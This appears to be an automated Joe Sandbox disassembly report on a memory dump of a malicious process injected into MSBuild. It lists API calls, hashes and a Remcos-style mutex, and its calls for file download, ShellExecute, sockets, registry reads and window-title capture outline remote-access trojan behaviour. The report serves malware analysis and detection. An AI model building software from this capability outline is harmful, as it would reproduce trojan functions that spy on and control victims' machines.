                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3604237281-0
                                                                                                                                                                                    • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                    • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                                                                                                    • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041B647
                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041B66C
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3919263394-0
                                                                                                                                                                                    • Opcode ID: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                                                                    • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0e0033f64f8451bb372a2b2a88171f1815919a66d822dbb045df1505d3cebfa8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CountEventTick
                                                                                                                                                                                    • String ID: >G
                                                                                                                                                                                    • API String ID: 180926312-1296849874
                                                                                                                                                                                    • Opcode ID: 47e68a8995c88e78faeaafd3bd7e5c14eea911c08b223d75bfb13917292dcb89
                                                                                                                                                                                    • Instruction ID: d5b3ec7783a4dd7183bbf31121b5a8e130ff38f85bff4fd723ced1f164cd3d8d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 47e68a8995c88e78faeaafd3bd7e5c14eea911c08b223d75bfb13917292dcb89
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A5170315042409AC624FB71D8A2AEF73A5AFD1314F40853FF94A671E2EF389949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0040BEF1
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateErrorLastMutex
                                                                                                                                                                                    • String ID: Rmc-L31JDJ
                                                                                                                                                                                    • API String ID: 1925916568-2866027240
                                                                                                                                                                                    • Opcode ID: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                                                                    • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c79194240bed052ca1f52dafa43431944ff159ec99ecee2a6806439040bd80
                                                                                                                                                                                    • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                                                    • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                                                                                                                                                                    • Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                                                                                    • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                                                                    • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                                                                                                                                                                    • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                                                                                    • RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                    • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                                                                                                    • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044E1C2
                                                                                                                                                                                    • _free.LIBCMT ref: 0044E1FB
                                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E202
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: EnvironmentStrings$Free_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2716640707-0
                                                                                                                                                                                    • Opcode ID: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                                                                                                                                                    • Instruction ID: bde093253d31ff8e435db0bb20b1dc60884eb56c9c20eb6ac573b4202a4b54cd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 032fcb4f66621f9a486cbfb9aa35bb7b186a8ceb34f2922937091fe798fd91d5
                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E0653714492126F211362B7C89D6F2A1DEFC2775B26013AF50596243EE688D0641EA
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0001C96F,00000000,00000000,00000000), ref: 00415D4A
                                                                                                                                                                                    • ShowWindow.USER32(00000009), ref: 00415D64
                                                                                                                                                                                    • SetForegroundWindow.USER32 ref: 00415D70
                                                                                                                                                                                      • Part of subcall function 0041BEB0: AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                                                      • Part of subcall function 0041BEB0: GetConsoleWindow.KERNEL32 ref: 0041BEBF
                                                                                                                                                                                      • Part of subcall function 0041BEB0: ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                                                      • Part of subcall function 0041BEB0: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 186401046-0
                                                                                                                                                                                    • Opcode ID: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                                                                                    • Instruction ID: d4a312bc08deb00524ad4f96a22c8b91b804439ffc6ddefb5fa2deb2480904ec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2746618531f85624d519dcfad62fa3fd490632c023c0ce94cdd3baf9e7c67748
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31F0B431104201EAD310AB61FC06AFA3768EB50301F10887FFC49C20B2DB3498859A5D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                                                                                                    • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                                                                                                    • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                    • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                    • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                                                                                                    • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                    • String ID: xAG
                                                                                                                                                                                    • API String ID: 176396367-2759412365
                                                                                                                                                                                    • Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                                                                    • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 0041526E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExecuteShell
                                                                                                                                                                                    • String ID: open
                                                                                                                                                                                    • API String ID: 587946157-2758837156
                                                                                                                                                                                    • Opcode ID: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                                                                                    • Instruction ID: a717779756fc853709bdab9af9b60c22d435cd15da1241abc9879386ec2ea144
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8674de7ec00f2757910a9bb23fdc902d0f1d7b475bfa7c08172f7d7b9988c4f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34E012712043459AD214FAB1ECD5EFF73A9EB90314F00483FB90A520E2EE789949D669
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 1890195054-2766056989
                                                                                                                                                                                    • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                    • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                                                                                                                                                                    • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00415745
                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004157A7
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DownloadFileSleep
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1931167962-0
                                                                                                                                                                                    • Opcode ID: 286bb3d375e658aa22142f0d651f746738f633b9c6cbd21d6452c1299eb64cc5
                                                                                                                                                                                    • Instruction ID: 2166b22bc077c02c1b93db8cb301ccfdac2f33cb5c0e2722be81623e7165673a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 286bb3d375e658aa22142f0d651f746738f633b9c6cbd21d6452c1299eb64cc5
                                                                                                                                                                                    • Instruction Fuzzy Hash: A81198315043019BC614FB72DC969FE73A9EF90318F00497FF846A31E2EE389949C69A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _free.LIBCMT ref: 0044B9DF
                                                                                                                                                                                      • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2447670028-0
                                                                                                                                                                                    • Opcode ID: cc11df9f9fc13595ab8ec5c56cbaacff42b4b2c00bfeb442f7665b2ecc47cd6b
                                                                                                                                                                                    • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                                                                                                    • Opcode Fuzzy Hash: cc11df9f9fc13595ab8ec5c56cbaacff42b4b2c00bfeb442f7665b2ecc47cd6b
                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                      • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateEventStartupsocket
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1953588214-0
                                                                                                                                                                                    • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                    • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                                                                                    • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                                                                                    • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
                                                                                                                                                                                      • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3476068407-0
                                                                                                                                                                                    • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                                                                    • Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
                                                                                                                                                                                    • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                                                                                                                                                                    • Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 0041AC74
                                                                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000007.00000002.4116922521.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000007.00000002.4116922521.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$ForegroundText
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 29597999-0
                                                                                                                                                                                    • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                                                                    • Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                                                                                      • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                                                                                      • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
